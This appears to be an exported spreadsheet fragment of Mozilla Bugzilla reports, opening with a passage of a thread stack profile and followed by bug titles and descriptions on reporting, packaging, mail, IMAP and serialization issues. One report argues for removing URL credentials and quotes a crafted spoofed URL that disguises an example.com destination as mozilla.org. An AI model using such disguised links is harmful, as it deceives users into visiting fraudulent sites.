                                      11 mach_msg_trap [STACK TOP]
                                1 __gcc_bcmp
                                  1 __gcc_bcmp [STACK TOP]
                              4 vm_msync
                                4 mach_msg
                                  4 mach_msg_trap
                                    4 mach_msg_trap [STACK TOP]
                              1 _spin_lock_try
                                1 _spin_lock_try [STACK TOP]
                              1 free_list_add_ptr
                                1 free_list_add_ptr [STACK TOP]
                              1 szone_free [STACK TOP]
                            2 vm_allocate
                              2 mach_msg
                                2 mach_msg_trap
                                  2 mach_msg_trap [STACK TOP]
                        2 szone_size
                          2 region_for_ptr_no_lock
                            2 region_for_ptr_no_lock [STACK TOP]
                      116 memmove
                        116 memmove [STACK TOP]
                    62 memmove
                      61 memmove [STACK TOP]
                      1 memmove
                        1 memmove [STACK TOP]
                    28 realloc
                      28 malloc_zone_realloc
                        28 szone_realloc
                          25 memmove
                            25 memmove [STACK TOP]
                          3 szone_malloc
                            3 large_and_huge_malloc
                              3 allocate_pages
                                3 vm_allocate
                                  2 mach_msg
                                    2 mach_msg_trap
                                      2 mach_msg_trap [STACK TOP]
                                  1 __gcc_bcmp
                                    1 __gcc_bcmp [STACK TOP]
                    21 NewPtr
                      19 NewPtr [STACK TOP]
                      2 malloc_zone_malloc
                        2 szone_malloc
                          2 large_and_huge_malloc
                            2 allocate_pages
                              2 vm_allocate
                                2 mach_msg
                                  2 mach_msg_trap
                                    2 mach_msg_trap [STACK TOP]
                    15 DCBlock_BuildContents(int DCBlock*) [STACK TOP]
                    11 memcmp
                      11 memcmp [STACK TOP]
                    7 szone_free
                      6 deallocate_pages
                        6 vm_deallocate
                          6 mach_msg
                            6 mach_msg_trap
                              6 mach_msg_trap [STACK TOP]
                      1 vm_msync
                        1 mach_msg
                          1 mach_msg_trap
                            1 mach_msg_trap [STACK TOP]
                    3 bcopy
                      3 bcopy [STACK TOP]
                    2 free
                      1 __gcc_bcmp
                        1 __gcc_bcmp
                          1 __gcc_bcmp [STACK TOP]
                      1 szone_size
                        1 szone_size [STACK TOP]
                    1 rest_world_eh_r7r8
                      1 rest_world_eh_r7r8 [STACK TOP]
                  12 rest_world_eh_r7r8
                    12 rest_world_eh_r7r8 [STACK TOP]
                  3 open
                    3 open [STACK TOP]
                  1 close
                    1 close [STACK TOP]
                  1 gettimeofday
                    1 __ppc_gettimeofday
                      1 __ppc_gettimeofday [STACK TOP]
                  1 strdup
                    1 malloc_zone_malloc
                      1 szone_malloc
                        1 szone_malloc [STACK TOP]
              15 FSMount::getattrs(unsigned long char const* unsigned long
unsigned long FSAttributeInfo* unsigned long unsigned char*)
                14 VolFSMount::_getattrs(unsigned long char const* unsigned
long unsigned long FSAttributeInfo* unsigned long unsigned char*)
                  14 GetVolFSAttributes(VolumeInfo* unsigned long char const*
unsigned long unsigned long FSAttributeInfo* unsigned long unsigned long
FSVolAttributeInfo* unsigned char*)
                    13 getattrlist_retry
                      10 getattrlist
                        10 getattrlist [STACK TOP]
                      3 CreateVolFSPath(unsigned unsigned long char const*
unsigned long char*)
                        3 sprintf
                          3 vfprintf
                            2 vfprintf [STACK TOP]
                            1 __ultoa
                              1 __ultoa [STACK TOP]
                    1 GetVolFSAttributes(VolumeInfo* unsigned long char
const* unsigned long unsigned long FSAttributeInfo* unsigned long unsigned
long FSVolAttributeInfo* unsigned char*) [STACK TOP]
                1 ColonsToSlashes(char*)
                  1 ColonsToSlashes(char*) [STACK TOP]
              5 ConvertToCatalogInfoAtIndex(VolumeInfo* unsigned char unsigned
long FSCatalogBulkParam* FSAttributeInfo const* unsigned char const*
unsigned long)
                4 ConvertFSAttributesToFSCatalogInfo(unsigned char unsigned
long FSAttributeInfo const* FSCatalogInfo*)
                  4 ConvertFSAttributesToFSCatalogInfo(unsigned char unsigned
long FSAttributeInfo const* FSCatalogInfo*) [STACK TOP]
                1 CreateFSRef(VolumeInfo const* unsigned long unsigned long
char const* unsigned long unsigned char FSRef*)
                  1 bzero
                    1 bzero [STACK TOP]
          42 FSDeleteObject
            42 PBDeleteObjectSync
              38 BasicDelete(VolumeInfo* unsigned long char const* unsigned char)
                26 Remove_VDI
                  26 syscall
                    26 syscall [STACK TOP]
                12 KillEnumerationCache(VolumeInfo* unsigned long)
                  11 DisposePtr
                    11 szone_free
                      6 deallocate_pages
                        6 vm_deallocate
                          6 mach_msg
                            6 mach_msg_trap
                              6 mach_msg_trap [STACK TOP]
                      5 vm_msync
                        5 mach_msg
                          5 mach_msg_trap
                            5 mach_msg_trap [STACK TOP]
                  1 DCBlock_Release(DCBlock*)
                    1 szone_free
                      1 free_list_remove_ptr
                        1 free_list_remove_ptr [STACK TOP]
              3 GetFSRefAttributes(FSMount* FSRefPrivate const* unsigned long
FSAttributeInfo* unsigned long char*)
                3 FSMount::getattrs(unsigned long char const* unsigned long
unsigned long FSAttributeInfo* unsigned long unsigned char*)
                  3 VolFSMount::_getattrs(unsigned long char const* unsigned
long unsigned long FSAttributeInfo* unsigned long unsigned char*)
                    3 GetVolFSAttributes(VolumeInfo* unsigned long char
const* unsigned long unsigned long FSAttributeInfo* unsigned long unsigned
long FSVolAttributeInfo* unsigned char*)
                      3 getattrlist_retry
                        3 getattrlist
                          3 getattrlist [STACK TOP]
              1 PBDeleteObjectSync [STACK TOP]
    1000 Thread_0e03
      1000 _pthread_body
        1000 __ape_agent
          1000 __ape_internal
            1000 mach_msg
              1000 mach_msg_trap
                1000 mach_msg_trap [STACK TOP]
    1000 Thread_0f03
      1000 _pthread_body
        1000 _pt_root
          1000 nsThread::Main(void*)
            1000 nsSocketTransportService::Run()
              1000 _pr_poll_with_poll
                1000 poll
                  1000 select
                    1000 select [STACK TOP]
    1000 Thread_1003
      1000 _pthread_body
        1000 _pt_root
          1000 nsThread::Main(void*)
            1000 nsDNSService::Run()
              1000 nsDNSService::DequeuePendingQ()
                1000 PR_WaitCondVar
                  1000 _pthread_cond_wait
                    1000 semaphore_wait_signal_trap
                      1000 semaphore_wait_signal_trap [STACK TOP]
    1000 Thread_1103
      1000 _pthread_body
        1000 _pt_root
          1000 nsThread::Main(void*)
            1000 TimerThread::Run()
              1000 PR_WaitCondVar
                1000 _pthread_cond_wait
                  1000 semaphore_wait_signal_trap
                    1000 semaphore_wait_signal_trap [STACK TOP]
    1000 Thread_1203
      1000 _pthread_body
        1000 _pt_root
          1000 nsThread::Main(void*)
            1000 nsThreadPoolRunnable::Run()
              1000 nsThreadPool::GetRequest(nsIThread*)
                1000 PR_WaitCondVar
                  1000 _pthread_cond_wait
                    1000 semaphore_wait_signal_trap
                      1000 semaphore_wait_signal_trap [STACK TOP]
Total number in stack (recursive counted multiple when &gt;=5):
        11       mach_msg
        11       mach_msg_trap
        5       __gcc_bcmp
        5       _pthread_body
        5       memmove
Sort by top of stack same collapsed (when &gt;= 5):
        semaphore_wait_signal_trap [STACK TOP]        3000
        mach_msg_trap [STACK TOP]        1059
        select [STACK TOP]        1000
        memmove [STACK TOP]        453
        getdirentries [STACK TOP]        358
        syscall [STACK TOP]        26
        NewPtr [STACK TOP]        19
        DCBlock_BuildContents(int DCBlock*) [STACK TOP]        15
        getattrlist [STACK TOP]        13
        rest_world_eh_r7r8 [STACK TOP]        13
        memcmp [STACK TOP]        11</t>
  </si>
  <si>
    <t>ploiku</t>
  </si>
  <si>
    <t>BUGZILLA-173005</t>
  </si>
  <si>
    <t>Add bar charts pie charts etc. to reporting</t>
  </si>
  <si>
    <t>We should use the Template Toolkit interface to GD to allow the generation of
bar charts pie charts etc. instead of tables for the reports.
Gerv</t>
  </si>
  <si>
    <t>CALENDAR-346890</t>
  </si>
  <si>
    <t>Sunbird is missing PrintPDE.plugin on Mac</t>
  </si>
  <si>
    <t>PrintPDE.plugin provides advanced print dialog functionality on the Mac.
We build it but we're not packaging it currently. 
As a result you see assertions like the following when printing from a debug build on the Mac:
###!!! ASSERTION: LoadPDEPlugIn() failed: 'NS_SUCCEEDED(rv)' file /Users/mwillis/moz/printing/mozilla/embedding/components/printingui/src/mac/nsPrintingPromptServiceX.cpp line 234
We should package PrintPDE.plugin with Sunbird.</t>
  </si>
  <si>
    <t>THUNDERBIRD-499273</t>
  </si>
  <si>
    <t>Delete Mail Marked as Junk in Folder action in Tools menu doesn't work.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090618 Minefield/3.6a1pre (.NET CLR 3.5.30729)
Build Identifier: Shredder/3.0b3pre Gecko/20090618
Delete Mail Marked as Junk in Folder action in Tools menu doesn't work with builds from about last 6 days. No messages in Error Console.
Reproducible: Always
Steps to Reproduce:
1. Go to folder with mail marked as junk
2. Use Delete Mail Marked as Junk in Folder action
3. Nothing happens
Actual Results:  
Nothing
Expected Results:  
Delete junk mail.
All clear.</t>
  </si>
  <si>
    <t>rain</t>
  </si>
  <si>
    <t>tmark00</t>
  </si>
  <si>
    <t>CORE-769913</t>
  </si>
  <si>
    <t>TestTXMgr.cpp should use fail() from TestHarness.h</t>
  </si>
  <si>
    <t>The test at  should be changed to use the fail() function defined in .
In particular every line reading
  printf(ERROR: ...
should instead read
  fail(...</t>
  </si>
  <si>
    <t>ananuti</t>
  </si>
  <si>
    <t>CORE-312927</t>
  </si>
  <si>
    <t>Incorrect Win32 Registry comments in nsGREGlue.cpp</t>
  </si>
  <si>
    <t>The comments in nsGREGlue.cpp refer to the registry key
Software\\Mozilla\\GRE but the key used is Software\\mozilla.org\\GRE as
defined in XPCOMPrivate.h.</t>
  </si>
  <si>
    <t>CORE-75198</t>
  </si>
  <si>
    <t>support XPCOM_DEBUG_BREAK=warn on Win32</t>
  </si>
  <si>
    <t>Win32 should support the XPCOM_DEBUG_BREAK environment variable: when set to 
``warn'' we should *not* trap into the debugger we should just print the 
console error message and return.
(This is useful e.g. for automating the layout regression tests.)</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-965622</t>
  </si>
  <si>
    <t>Awesomescreen</t>
  </si>
  <si>
    <t>Handle the case where there are no items for a given dataset id</t>
  </si>
  <si>
    <t>When we load dynamic panels we do queries to fetch the items associated with the dataset for each view.
However it can be the case that there are no items for the specified dataset (e.g. the add-on didn't store any data yet).
We should do something to handle this. For the simplest case we can just show some sort of generic no data message but in the future it would be nice to allow the add-on to specify what to say. This would also be a good place to put some UI for launching into some authentication UI (e.g. Sign into your ___ account to see stuff!).</t>
  </si>
  <si>
    <t>TOOLKIT-421396</t>
  </si>
  <si>
    <t>Extension installation fails with item is null in nsExtensionManager.js</t>
  </si>
  <si>
    <t>Created attachment 307826
Extensions.log
Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b5pre) Gecko/2008030607 Minefield/3.0b5pre ID:2008030607
Steps to reproduce:
1. Try and install extension such as http://www.kaply.com/operator/activities.xpi
2. Select Allow in the info bar
3. Click Install Now in the count down prompt
4. Error is displayed in prompt in Addons Manager
Minefield could not install the file at 
http://www.kaply.com/operator/activities.xpi
because: Unexpected installation error
Review the Error Console log for more details.
-203
Error console gives:
Item is null on the following line
var installLocation = this.getInstallLocation(item.id)
Relevant profile files are attached.</t>
  </si>
  <si>
    <t>NSPR-83930</t>
  </si>
  <si>
    <t>A typo in PR_LockFile in pr/src/io/prfile.c.</t>
  </si>
  <si>
    <t>I found a typo in the PR_LockFile function in
pr/src/io/prfile.c.  The assignment statement
    fd-&gt;secret-&gt;lockCount = -1
was incorrectly typed in as
    fd-&gt;secret-&gt;lockCount == -1
That implementation is only used by Windows.
The version used by Unix flavors (in
pr/src/pthreads/ptio.c) does not have this typo.
This bug only affects the condition when a thread
is in the middle of calling the native lock file
system call and another thread tries to lock the
same file at that time.  This could be why it was
not detected by our 'lockfile' test because our
test may not be able to create that condition.
Chris do you remember what happens on NT if a thread
owns a file lock and another thread in the same
process tries to lock the same file?  Does the
lockfile operation fail with a deadlock error
or block until the first thread releases its file
lock?</t>
  </si>
  <si>
    <t>SEAMONKEY-235447</t>
  </si>
  <si>
    <t>Images embedded with the OBJECT tag are not selectable or saveable in Page Info</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7b) Gecko/20040222 Firefox/0.8.0+ 
Please see screenshot: http://www.ulujain.org/images/objectnowork.gif
An image is embedded in a page using OBJECT using valid (X)HTML. The image
appears in the normal page view. If you right click and select Page Info --&gt;
Media you do not get the image displayed. You get a generic icon. Other people
have reported the same result using Firebird/Fox. If the image is marked up
using IMG it is selectable and saveable from the Page Info --&gt; Media tab.
The image has the proper MIME type associated with it.
Reproducible: Always
Steps to Reproduce:
1. Embed an image using OBJECT
2. Right click on page containing OBJECT
3. Try and select/save the image in Page Info --&gt; Media 
Actual Results:  
Nothing happens. The image is not selectable/saveable
Expected Results:  
Displayed an image in the list of media types.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-529019</t>
  </si>
  <si>
    <t>[lt] 3.6 whatsnew/firstrun localization</t>
  </si>
  <si>
    <t>CORE-148996</t>
  </si>
  <si>
    <t>enable the feature of Drag and Drop on Bookmarks button on the personal toolbar</t>
  </si>
  <si>
    <t>Bug 96504 after dragging proxy icon onto bookmarks button bookmarks menu
refuses to close has disabled this feature for mozilla 1.0
This bug is re-enable this feature on trunk.</t>
  </si>
  <si>
    <t>CORE-488084</t>
  </si>
  <si>
    <t>video volume slider not displayed in correct position</t>
  </si>
  <si>
    <t>From bug 475317 comment 12:
Enn: I'm hitting a weird bug... Start playing a video then click the mute
button. The volume slider should move to the bottom (0) but it stays at the
top (100). Now move the mouse away (so the controls fade out) then back over
and... ta-da the volume slider is now being drawn at the correct position.
Further clicks on the mute button make the volume  work normally.
The immediate cause of this is that the CurrentPositonChanged() code in
nsSliderFrame is hitting the do nothing if the position did not change case
and bails out (curpospx is 0 instead of the expected 100).
The real problem occurs earlier on... Calls to _setIntegerAttribute() in
scale.xul and calls to nsSliderFrame::AttributeChanged() should occur in pairs.
But I'm not seeing the call to AttributeChanged() when the scale's value is set
from the video control's setupInitialState() nor does it get called when I
hardcode  in the XUL. The code in _setIntegerAttribute() is
calling setAttribute() in all these cases so I'm not sure where things are
going wrong early on.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-249259</t>
  </si>
  <si>
    <t>[l10n] there are no strings in .strings files to translate the Allow/Deny buttons in cookies dialog</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:0.9.4.1) Gecko/2002 - Netscape 6.2 Mac OS X
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:0.9.4.1) Gecko/2002 - Netscape 6.2 Mac OS X
When the preference to always ask for cookies acceptance is on a sheet appears
to ask confirmation. At the moment you cannot specify alternative strings for
the buttons for non english languages.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>NSS-129354</t>
  </si>
  <si>
    <t>p7sign: the security password entered is incorrect</t>
  </si>
  <si>
    <t>The p7sign tool in NSS does not work because it cannot retreive info from the 
private-key database.  There is no way to enter a password for the database.  
p7sign will display an error message: p7sign: problem signing data: The security 
password entered is incorrect.
The solution:
Add a command-line argument -p to enter a password.  Add a call to 
PK11_SetPasswordFunc() in main() to set a callback function to retreive the 
password.</t>
  </si>
  <si>
    <t>evanchu</t>
  </si>
  <si>
    <t>CORE-232567</t>
  </si>
  <si>
    <t>Warn when HTTP URL auth information isn't necessary or when it's provided</t>
  </si>
  <si>
    <t>Mozilla needs to remove all support for username and password authentication in
the URL from HTTP HTTPS and HTTP with SSL. This problematic feature allows
URLs in the form of:
http://username1:password2@example.com
Currently when Mozilla gets that URL it takes the user to example.com and logs
the user in as username1 with password2. Unfortunately this can be
exploited. Indeed it has grown increasingly common that URLs in the form of
http://username:password@example.com are creating large security problems. Take
this example:
http://www.mozilla.org&amp;item%3Dq:20933773d88383h2nf8dhdfjk3jk377d7djk3354@example.com/bad/evil/fraud/identitytheft
Following that URL a user might think he is going to the friendly confines of
mozilla.org. Unfortunately he ends up at the unfriendly confines of
http://example.com/bad/evil/fraud/identitytheft. 
This feature is being used today to harm and exploit our users. We have to respond.
Mozilla has made improvements in our handling of these URLs. Further
improvements are on the drawing board. 
Neverthless any improvements ultimately cannot raise our level of security high
enough. We can try to fashion a dialog box or even highlight the URL in an eye
catching manner. User education must accompany any such enhancement of course.
The Internet will always have many new inexperienced and uneducated users.
Even experienced users sometimes click on the wrong URLs by accident. Therefore
it is inevitable that many Mozilla users will be exploited by this feature no
matter how we improve on it.
The only way to really solve the problem once and for all is to rip out URL
authentication altogether.
RFC 1738 may indeed require that an HTTP(S) implementation (like Mozilla) honor
URL authentication. 
http://www.faqs.org/rfcs/rfc1738.html
Allowing these kinds of URLs was fine a few years ago. Today however it
creates a security hole ever more commonly exploited. The Mozilla Project does
need to honor standards. Yet when the purpose of a certain standard is no
longer relevant or is outweighed by other concerns--such as security--then we
have to react to the changing real world conditions. Today the cost of
supporting this feature far outweighs the benefit. By removing this feature we
will fix a major security hole for good.
Microsoft has announced it will remove support for these URLs.
http://support.microsoft.com/default.aspx?scid=kb[LN]834489
Since MSIE currently has an 80%+ market share most sites that make use of this
feature will soon give it up. Thus when Mozilla follows suit and removes the
feature our userbase will not be terribly aggrieved.
Neither FTP nor any other protocol is affected by this bug report.</t>
  </si>
  <si>
    <t>contact2009</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-489355</t>
  </si>
  <si>
    <t>Label about ready for public nomination should be hidden if the addon is already nominated.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 de rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
Build Identifier: 
On the status page for an extension there's a label called:
You may now nominate your add-on for Public by clicking the button below.
This is displayed even if the addon was already nominated.
It should be hidden then.
Reproducible: Always</t>
  </si>
  <si>
    <t>SEAMONKEY-32180</t>
  </si>
  <si>
    <t>GTK linking problem</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.7 [en] (X11 I IRIX 6.5 IP32)
BuildID:    Didn't get that far but the tar is dated Mar 16 17:29
Mozilla for IRIX does not properly link to the libgtk-1.2.so.
App does not start at all.
Reproducible: Always
Steps to Reproduce:
1. type mozilla at the command line
2.
3.
Actual Results:  % ./mozilla
.//run-mozilla.sh ./mozilla-bin
MOZILLA_FIVE_HOME=/wb/people/greg/downloads/package
LD_LIBRARY_PATH=/wb/people/greg/downloads/package:/wb/apps/Softimage/Soft3D_3.8SP2/3D/dso:/wb/apps/Softimage/Soft3D_3.8SP2/3D/custom/bin:/wb/apps/Softimage/Soft3D_3.8SP2/3D/custom/dso:/wb/apps/Softimage/Soft3D_3.8SP2/Particle/dso:/wb/apps/Softimage/Soft3D_3.8SP2/3D/dso/softGraphicOGL:/wb/apps/aw/COM/lib:/wb/apps/aw/maya/bin/plug-ins:/wb/apps/aw/maya/lib:/wb/apps/aw/studiopaint9.0/installsysfiles/ImageVision/filefmt:/wb/apps/aw/studiopaint9.0/lib:/wb/apps/aw/studiopaint9.0/plug-ins:/wb/apps/mi/shaders:/wb/apps/mi/mayatomi/lib:/wb/apps/mi/mayatomi:
       SHLIB_PATH=/wb/people/greg/downloads/package
          LIBPATH=/wb/people/greg/downloads/package
      MOZ_PROGRAM=./mozilla-bin
      MOZ_TOOLKIT=
        moz_debug=0
     moz_debugger=
13207:./mozilla-bin: rld: Warning: Version Search Suppressed in ./mozilla-bin
Because Object libgtk-1.2.so in liblist has non-sgi interface version (0.0)
13207:./mozilla-bin: rld: Fatal Error: Cannot Successfully map soname
'libgtk-1.2.so' under any of the filenames
./libgtk-1.2.so:/wb/apps/Softimage/Soft3D_3.8SP2/3D/dso/libgtk-1.2.so:/wb/apps/Softimage/Soft3D_3.8SP2/3D/custom/bin/libgtk-1.2.so:/wb/apps/Softimage/Soft3D_3.8SP2/3D/custom/dso/libgtk-1.2.so:/wb/apps/Softimage/Soft3D_3.8SP2/Particle/dso/libgtk-1.2.so:/wb/apps/Softimage/Soft3D_3.8SP2/3D/dso/softGraphicOGL/libgtk-1.2.so:/wb/apps/aw/COM/lib/libgtk-1.2.so:/wb/apps/aw/maya/bin/plug-ins/libgtk-1.2.so:/wb/apps/aw/maya/lib/libgtk-1.2.so:/wb/apps/aw/studiopaint9.0/installsysfiles/ImageVision/filefmt/libgtk-1.2.so:/wb/apps/aw/studiopaint9.0/lib/libgtk-1.2.so:/wb/apps/aw/studiopaint9.0/plug-ins/libgtk-1.2.so:/wb/apps/mi/shaders/libgtk-1.2.so:/wb/apps/mi/mayatomi/lib/libgtk-1.2.so:/wb/apps/mi/mayatomi/libgtk-1.2.so:/usr/lib32/libgtk-1.2.so:/usr/lib32/internal/libgtk-1.2.so:/lib32/libgtk-1.2.so:/opt/lib32/libgtk-1.2.so: 
% 
Expected Results:  
Mozilla should start
Seeing that mozilla was having problems finding the libgtk
library I copied libgtk-1.2.so directly to the mozilla 
directory and added . to the LD_LIBRARYN32_PATH.  This 
didn't help.  The root of the problem seems to be the 
Object libgtk-1.2.so in liblist has non-sgi interface version (0.0)
error message.  This is not a normal message for just a 
missing library.  The library is found properly by our 
other gtk apps.</t>
  </si>
  <si>
    <t>SEAMONKEY-258361</t>
  </si>
  <si>
    <t>replace XUL_NAMESPACE with XUL_NS</t>
  </si>
  <si>
    <t>SEAMONKEY-478913</t>
  </si>
  <si>
    <t>Some Help buttons (e.g. in Message Filters dialog) bring up empty Help window (Help file not found)</t>
  </si>
  <si>
    <t xml:space="preserve">With a current nightly I see the following when pressing the Help button in e.g. the Message Filters Search Messages or Advanced Address Book Search dialogs:
1. an empty Help window comes up (empty window title sidebar and content pane)
2. the Error Console says:
  Help file:  was not found.
and
  TypeError: datasource is undefined
Counter example: the Help button in the Filter Rules dialog (which is used to create/edit filter rules) works. The difference here is that the Filter Rules dialog is connected to helpMessengerOverlay.xul (see /suite/common/jar.mn line 39) which calls setHelpFileURI() (see line 45) which has the effect of making the second parameter to openHelp() optional (cf. Toolkit's contextHelp.js line 48). 
Ratty (who helped with the analysis) suggested to call setHelpFileURI() in utilityOverlay.js but I wonder if simply moving the broken dialogs over to using helpMessengerOverlay.xul is the better way to go.
This should help finding the affected files:
whereas these are not affected:
</t>
  </si>
  <si>
    <t>CORE-332198</t>
  </si>
  <si>
    <t>change nsGenericDOMDataNode::ToCString</t>
  </si>
  <si>
    <t xml:space="preserve">Currently nsIContent::DumpContent will generate output like:
Please read the FAQ at &gt;
While this is nice it's very confusing. Especially to poor newbie debugger tool users like myself.
Steps:
* use nsIContent::DumpContent on venkman's html pane
Actual Results:
... Please read the FAQ at &gt;
Expected Results:
... Please read the FAQ at </t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-341826</t>
  </si>
  <si>
    <t>Need Cairo/Cocoa MacOS X tinderbox</t>
  </si>
  <si>
    <t>It's time to set up a MacOS X tinderbox building Cocoa-widget builds with and without Cairo enabled.
The relevant configure option is --enable-default-toolkit=cocoa and cairo-cocoa.  I think we want both builds published to the experimental builds dir (firefox/nightly/experimental/cocoa and /cairo-cocoa).</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-262778</t>
  </si>
  <si>
    <t>View google cached pages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040929 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040929 Firefox/0.10
A firefox extension that allows you to see the current page in the google cache.
 Can be handy if the website you are visiting is currently down or changed
Reproducible: Always
Steps to Reproduce:
not a problem but a new firefox extension
Actual Results:  
not a problem but a new firefox extension
Expected Results:  
not a problem but a new firefox extension
not a problem but a new firefox extension</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-165253</t>
  </si>
  <si>
    <t>Courier-IMAP: Can't see IMAP folders the first time</t>
  </si>
  <si>
    <t>When I start up MailNews I see a list like this:
my@email.com
 - Inbox
 - Drafts
 - Templates
 - Sent
 - Trash
This is the cached list from last time but when I click Get Msgs of if Check
for new mail at startup is enabled the list becomes
my@email.com
 - Inbox
 - Trash
right after the check is done. If I reduce and expand the folder view all my
folders are suddenly back.
I'm using Courier-IMAP and have the following settings in Mozilla:
IMAP server directory: INBOX.
Personal namespace:
Public namespace: shared.
Do not allow server to override these namespaces
Here is the IMAP communication. The first time I check for mail (and the folders
disappear) these commands are sent:
* OK Courier-IMAP ready. Copyright 1998-2002 Double Precision Inc.  See COPYING
for distribution information.
1 capability
* CAPABILITY IMAP4rev1 CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT
THREAD=REFERENCES SORT QUOTA
1 OK CAPABILITY completed
2 login username password
2 OK LOGIN Ok.
3 lsub  INBOX./*
3 OK LSUB completed.
4 lsub  shared.*
4 OK LSUB completed.
5 list  INBOX
* LIST (\Unmarked \HasChildren) . INBOX
5 OK LIST completed.
6 list  INBOX.Trash
* LIST (\HasNoChildren) . INBOX.Trash
6 OK LIST completed.
7 create INBOX.Trash
7 NO Cannot create this folder.
8 select INBOX
...
When I reduce and expand the folder view these messages are sent:
* OK Courier-IMAP ready. Copyright 1998-2002 Double Precision Inc.  See COPYING
for distribution information.
1 login username password
1 OK LOGIN Ok.
2 lsub  INBOX.*
* LSUB (\HasNoChildren) . INBOX.Trash
* LSUB (\HasNoChildren) . INBOX.Templates
* LSUB (\HasNoChildren) . INBOX.Sent
* LSUB (\HasNoChildren) . INBOX.Drafts
2 OK LSUB completed.
3 lsub  shared.*
3 OK LSUB completed.
4 list  INBOX
* LIST (\Unmarked \HasChildren) . INBOX
4 OK LIST completed.
As you can see the difference is that when it goes wrong Mozilla sends the command:
lsub  INBOX./*
instead of this command (which is sent the second time)
lsub  INBOX.*
The last is the correct command since that is what I have set Mozilla up to use
(and it works :)
Why does Mozilla insist on placing the / at the end when I check for messages
the first time even though it's not set under preferences?
This was not an issue with Mozilla 1.0 (there you just had to edit prefs.js
manually to get rid of the / at the end) but only with Mozilla 1.1
This happens with the Windows version too (tested under Windows 2000)</t>
  </si>
  <si>
    <t>THUNDERBIRD-361150</t>
  </si>
  <si>
    <t>Message aging with grouped views can crash [@thunderbird-bin + 0x402 (0xb7f13402) 41762308]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061113 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061113 Minefield/3.0a1
Using TB-3a1 (20061118) under Fedora core 5.
After settings one of my RSS folder's Message Aging to Delete all but last '20' messages whenever I click on that folder after new RSS feeds are downloaded  TB-3a1 crashes and opens 'Netscape Quality Feedback'.
Reproducible: Always
Steps to Reproduce:
1.Set Messaging policy of any RSS folder to Delete all but last 'XX' messages
2.Select any Other folder.Download some RSS feeds for that RSS folder by Get Mail &gt; News &amp; Blogs.
3.Click on that RSS folder.
Actual Results:  
TB-3a1 crashes and opens 'Netscape Quality Feedback'
Expected Results:  
Message Aging should work without any problem.
Some Other Talkback ID:
TB26180891Z
TB26182711X
This same behaviour occurs for any other mail folder also.</t>
  </si>
  <si>
    <t>nir.sen</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-230099</t>
  </si>
  <si>
    <t>nsRDFXMLSerializer incorrectly serializes newline characters in literals</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031016
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031016
When literal containing newline characters serialized into XML newline
characters insert as is into the attribute of RDF:Description. Then while
reading this value from XML parser treats these newline characters as spaces so
writing and rereading of XML leads to lost line breaks.
Reproducible: Always
Steps to Reproduce:
text_res = this.RDF.GetLiteral(Some \n text \n goes \n here)
this.ds.Assert(this.selected this.rdf_text text_res true)
this.flush()
Actual Results:  
In the RDF file:
&lt;RDF:Description about=rdf:#$XHK122
     otl:text=Some 
 text 
 goes 
 here /&gt;
There are two possible ways to resolve this prob:
1) Quote newline characters while serializing literal into the Description's
attribute.  works fine. Heh I've got no idea about possible issues with
different newline representation in different OS could it be a prob here?
2) Serialize complex literals as tag not attribute. I.e.
Some 
 text 
 goes 
 here
Both parses correctly but second is more readable (IMHO).</t>
  </si>
  <si>
    <t>tingley</t>
  </si>
  <si>
    <t>mrj</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-471754</t>
  </si>
  <si>
    <t>moz2-win32-slave13 got itself stuck on the 191b2_RELBRANCH</t>
  </si>
  <si>
    <t>moz2-win32-slave13 is burning WINNT 5.2 mozilla-1.9.1 unit test % after getting itself confused by an accidental checkin to the GECKO191b2_20081125_RELBRANCH which has now left it hanging there building revision 4f216e3d60cf over and over again since it lacks enough sense to |hg update -r default|.
I presume you don't have instructions for updating (or blowing away) repos but perhaps it can be shut down to keep it from grabbing jobs and burning up the tree before passing it on to build?</t>
  </si>
  <si>
    <t>CORE-59869</t>
  </si>
  <si>
    <t>Retrieve win32 user's show window contents while dragging setting</t>
  </si>
  <si>
    <t>For bug 59867 we need to retrieve the boolean value of the user's Show window 
contents while dragging setting on Windows.  I suppose this needs to be done 
in nsLookAndFeel.cpp so cc'ing various people who have touched the Windows 
version of that file to see if they can help us out.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-326776</t>
  </si>
  <si>
    <t>Create bonsai-www.mozilla.org</t>
  </si>
  <si>
    <t>We have three bonsai installs each dealing with a different repository.  Two of them have their own domain names:
bonsai.mozilla.org
bonsai-l10n.mozilla.org
The third one is piggy-backing on a domain name that's meant for another 
purpose. :)  We should fix that.
